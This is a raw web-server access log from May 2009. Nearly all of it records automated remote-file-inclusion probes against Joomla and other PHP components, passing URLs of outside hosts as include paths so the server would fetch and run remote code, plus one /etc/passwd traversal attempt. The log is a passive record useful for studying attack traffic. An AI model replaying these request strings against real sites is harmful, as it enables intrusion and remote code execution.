195.74.61.78 - - [08/May/2009:02:56:43 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
195.74.61.78 - - [08/May/2009:02:56:44 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
77.221.130.6 - - [08/May/2009:02:57:26 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:02:57:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
77.221.130.6 - - [08/May/2009:02:57:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
110.45.146.146 - - [08/May/2009:02:57:37 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:57:37 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:57:37 -0400] "GET /logs/access_log.Q108122300/components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:58:05 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:58:05 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:58:05 -0400] "GET /logs/access_log.Q108091000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:02:58:26 -0400] "GET /logs/access_log.Q108090400/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
89.111.184.103 - - [08/May/2009:02:58:27 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:02:58:27 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
89.111.184.103 - - [08/May/2009:02:58:27 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
58.227.193.198 - - [08/May/2009:02:58:30 -0400] "GET /logs/error_log.Q108090200%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
212.158.163.67 - - [08/May/2009:02:58:46 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
212.158.163.67 - - [08/May/2009:02:58:46 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:02:58:47 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:58:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:58:47 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.158.163.67 - - [08/May/2009:02:58:47 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
86.54.102.45 - - [08/May/2009:02:58:51 -0400] "GET /logs/access_log.Q109041900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:02:59:09 -0400] "GET /logs/access_log.Q108090200%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:02:59:14 -0400] "GET /images/items/index_liftkit_over.jpg HTTP/1.1" 200 3561 "-" "Googlebot-Image/1.0"
222.239.76.25 - - [08/May/2009:02:59:20 -0400] "GET /logs/error_log.Q108122900%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:59:30 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
86.54.102.45 - - [08/May/2009:02:59:30 -0400] "GET /logs/access_log.Q109041900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.74.61.78 - - [08/May/2009:02:59:51 -0400] "GET /logs/access_log.Q109042600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.808"
195.74.61.78 - - [08/May/2009:02:59:51 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.808"
195.74.61.78 - - [08/May/2009:02:59:53 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.808"
124.0.54.98 - - [08/May/2009:03:00:04 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:00:04 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:00:09 -0400] "GET /logs/access_log.Q109040300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:00:11 -0400] "GET /logs/access_log.Q108091000%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:00:11 -0400] "GET /logs/access_log.Q108091400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:03:00:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.253.45 - - [08/May/2009:03:00:14 -0400] "GET /logs///modules/Forums/admin/errors.php?error=../../../../../../../../etc/passwd HTTP/1.0" 404 236 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [08/May/2009:03:00:14 -0400] "GET /logs//modules/Forums/admin/errors.php?error=http://www.rabika.ru/hk? HTTP/1.0" 404 235 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
218.24.179.193 - - [08/May/2009:03:00:15 -0400] "GET /logs//index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 213 "-" "Mozilla/5.0"
218.24.179.195 - - [08/May/2009:03:00:16 -0400] "GET /logs/access_log.Q108111200//index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:00:20 -0400] "GET /logs/access_log.Q108090400%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:00:21 -0400] "GET /logs/access_log.Q108122300%20%20/components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:03:00:22 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:00:22 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
218.24.179.193 - - [08/May/2009:03:00:27 -0400] "GET //index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 208 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:03:00:27 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:00:31 -0400] "GET /logs/access_log.Q108091000///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:00:36 -0400] "GET /logs/access_log.Q108090200%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
218.24.179.193 - - [08/May/2009:03:00:37 -0400] "GET /logs/access_log.Q108101700//index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:00:39 -0400] "GET /logs/access_log.Q109041100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:00:43 -0400] "GET /logs/access_log.Q108111200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:01:08 -0400] "GET /logs/access_log.Q109010100%20%20/components/com_forum/download.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:03:01:11 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:03:01:11 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:03:01:11 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
195.20.225.45 - - [08/May/2009:03:01:21 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:01:21 -0400] "GET /logs/access_log.Q109040400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:01:21 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:01:21 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:01:29 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:03:01:29 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
218.24.179.193 - - [08/May/2009:03:01:43 -0400] "GET /logs/access_log.Q108111200%20%20//index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:01:47 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:01:47 -0400] "GET //e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:01:47 -0400] "GET /logs/access_log.Q108102500//e404.php?DOCUMENT_ROOT=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.24.179.192 - - [08/May/2009:03:01:50 -0400] "GET /logs/access_log.Q108101700%20%20//index.php?option=com_zoom&Itemid=41&page=view&catid=1&key=39&hit=1/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:03:02:11 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
210.68.188.206 - - [08/May/2009:03:02:16 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:03:02:16 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:03:02:21 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
81.176.226.180 - - [08/May/2009:03:02:44 -0400] "GET /logs/access_log.Q108112300//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:03:02:44 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:03:02:44 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:02:52 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:03:02:52 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.93.90.162 - - [08/May/2009:03:03:03 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
81.176.226.180 - - [08/May/2009:03:03:10 -0400] "GET /logs/access_log.Q108101700//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:03:28 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:03:37 -0400] "GET /logs/access_log.Q109042200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:03:37 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:03:39 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:03:40 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.118.194.225 - - [08/May/2009:03:03:58 -0400] "GET /logs/access_log.Q109042600//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.813"
210.118.194.225 - - [08/May/2009:03:03:59 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.813"
210.118.194.225 - - [08/May/2009:03:03:59 -0400] "GET /logs//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 485 "-" "libwww-perl/5.813"
124.0.54.98 - - [08/May/2009:03:04:03 -0400] "GET /logs/access_log.Q109041900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:03:04:29 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id2x.txt??%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
210.68.188.206 - - [08/May/2009:03:05:04 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:03:05:12 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
209.59.12.99 - - [08/May/2009:03:05:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.20.225.45 - - [08/May/2009:03:06:00 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:03:06:00 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.111.184.103 - - [08/May/2009:03:06:30 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
110.45.146.88 - - [08/May/2009:03:06:31 -0400] "GET /download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:03:06:31 -0400] "GET /logs/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:03:06:31 -0400] "GET /logs/access_log.Q108102500/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.72.114 - - [08/May/2009:03:06:39 -0400] "GET /logs/access_log.Q108070500 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.158.163.67 - - [08/May/2009:03:06:39 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
124.0.54.98 - - [08/May/2009:03:06:46 -0400] "GET /logs/access_log.Q108092400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:03:06:47 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.20.225.45 - - [08/May/2009:03:06:49 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
110.45.146.146 - - [08/May/2009:03:07:00 -0400] "GET /download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:07:00 -0400] "GET /logs/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
110.45.146.146 - - [08/May/2009:03:07:00 -0400] "GET /logs/access_log.Q108102500/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
110.45.146.88 - - [08/May/2009:03:07:17 -0400] "GET /logs/access_log.Q108102500%20%20/download.php?sub=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:03:07:20 -0400] "GET /logs/access_log.Q108101000//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
124.0.54.98 - - [08/May/2009:03:07:33 -0400] "GET /logs/access_log.Q109042200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
